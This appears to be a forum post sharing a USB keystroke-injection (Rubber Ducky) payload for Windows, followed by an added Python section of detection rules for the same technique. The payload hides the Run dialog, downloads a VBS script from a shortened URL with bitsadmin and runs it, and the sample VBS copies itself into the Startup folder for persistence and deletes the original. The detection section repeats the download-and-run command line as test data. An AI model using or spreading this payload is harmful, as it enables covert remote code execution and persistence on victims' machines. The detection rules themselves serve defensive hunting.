I have tested this on Windows 7, but nothing else. Still need to test what happens if you run this from a crazy locked down account, but so far it seems to work fine without ever prompting for UAC or complaining about permission issues.
REM This payload will download a given file, save it to the user's home directory, and execute it. Works great for VBS files.
REM Make sure the file terminates quickly, as the window will stay open until it does. But the window will be blank and minimized.
DELAY 10000
GUI r
DELAY 200
REM Move the run dialog out of the way
ALT SPACE
DELAY 20
STRING M
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 10
ENTER
REM Start the download and execution
STRING cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a http://bit.ly/42z1aRg %userprofile%/pl.vbs & %userprofile%/pl.vbs"
ENTER
Sample code for the VBS file to ensure it terminates quickly, deletes the original, and also enables auto run on machine startup:
' Find the logged in user's startup folder
set WshShell = WScript.CreateObject("WScript.Shell" )
strStartup = WshShell.SpecialFolders("StartMenu")
' See if we are running from the copy in the startup folder
if (WScript.scriptName <> "helper.vbs") Then
' We are not, so copy this file into the startup folder
dim filesys: set filesys=CreateObject("Scripting.FileSystemObject")
filesys.CopyFile WScript.ScriptFullName, strStartup + "\programs\startup\helper.vbs"
' Delete the original
filesys.DeleteFile(WScript.ScriptFullName)
' Now execute the copy in the startup folder (asynchronously, so we don't hang waiting for it to finish)
WshShell.Run("""C:\Windows\System32\wscript.exe"" """ + strStartup + "\programs\startup\helper.vbs""")
' We have a copy running from a different process now, so we can quit this one
WScript.Quit
End If
' Do the rest of your vbs payload here.
So when this runs, the ducky script will open a run prompt. Enter 115 characters. A blank CMD window will open and minimize, then sit there for a second. While it's open, in the background it's downloading the vbs file from a remote server, copying it to the user's directory, and executing it. The vbs script will copy itself to the user's startup directory, execute the copy, and terminate itself. At that time, the CMD window (still blank and minimized) will close. You now have a VBS script that will run on startup, and can run for as long as you need as a background process.
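One way to spot the chain this post describes from process-creation telemetry, as an added example that is not part of the original post or its payload. It assumes command lines like those recorded by Sysmon Event ID 1 or Windows security event 4688, and the sample lines are constructed (with example.invalid standing in for the shortened URL). The three rules cover the distinct stages the post walks through: bitsadmin fetching a script from a URL, a minimized cmd chain that downloads and then runs the script, and wscript launching a file from a Start Menu Startup folder.

```python
"""Hunting rules for the bitsadmin download -> Startup-folder VBS chain.

Added example for defenders; not code from the original post.  The sample
command lines below are constructed to resemble Sysmon Event ID 1 / 4688
CommandLine fields, with example.invalid in place of the real URL.
"""
import re
from dataclasses import dataclass

# Script-type extensions worth flagging as a bitsadmin download target or
# as a file executed from a Startup folder.
SCRIPT_EXT = r"\.(?:vbs|vbe|js|jse|wsf|wsh|hta|ps1|bat|cmd)\b"


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    description: str


RULES = [
    Rule(
        "bitsadmin_transfer_script",
        re.compile(
            r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?https?://\S+.*?" + SCRIPT_EXT,
            re.I,
        ),
        "bitsadmin /transfer pulling a script file from a URL",
    ),
    Rule(
        "hidden_cmd_chain_download_and_run",
        re.compile(
            r"\bcmd\b.*?\bstart\s+/min\b.*?\bbitsadmin\b.*?&\s*\S*" + SCRIPT_EXT,
            re.I,
        ),
        "minimized cmd chain that downloads a script and then executes it",
    ),
    Rule(
        "script_run_from_startup_folder",
        re.compile(
            r"\b[wc]script(?:\.exe)?\b.*?\\start\s+menu\\programs\\startup\\",
            re.I,
        ),
        "wscript/cscript executing a file placed in a Start Menu Startup folder",
    ),
]

# Constructed sample telemetry: lines 0-2 mirror the stages in the post,
# lines 3-5 are benign activity that should not fire.
SAMPLE_COMMAND_LINES = [
    r'cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a '
    r'http://example.invalid/pl.vbs C:\Users\alice/pl.vbs & C:\Users\alice/pl.vbs"',
    r"bitsadmin /rawreturn /transfer a http://example.invalid/pl.vbs C:\Users\alice/pl.vbs",
    r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Roaming\Microsoft'
    r'\Windows\Start Menu\programs\startup\helper.vbs"',
    r"bitsadmin /transfer updateJob /download /priority normal "
    r"https://updates.example.invalid/patch.msi C:\Temp\patch.msi",
    r'"C:\Windows\System32\wscript.exe" "C:\Scripts\inventory.vbs"',
    r"notepad.exe C:\Users\alice\Documents\notes.txt",
]


def scan(command_lines):
    """Return (line_index, rule_name) for every rule that fires on each line.

    A line can produce several hits; the full chain in one command line
    matches both the bitsadmin rule and the hidden-cmd-chain rule.
    """
    hits = []
    for idx, line in enumerate(command_lines):
        for rule in RULES:
            if rule.pattern.search(line):
                hits.append((idx, rule.name))
    return hits


def rule_by_name(name):
    """Look up a rule so callers can show its description in an alert."""
    return next(r for r in RULES if r.name == name)


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: {name} - {rule_by_name(name).description}")
```

The rules are deliberately loose (any bitsadmin transfer of a script extension fires, not just .vbs), so treat them as hunting signals to be tuned against your own baseline rather than as block rules; legitimate bitsadmin use for installers, as in the constructed .msi line, stays quiet.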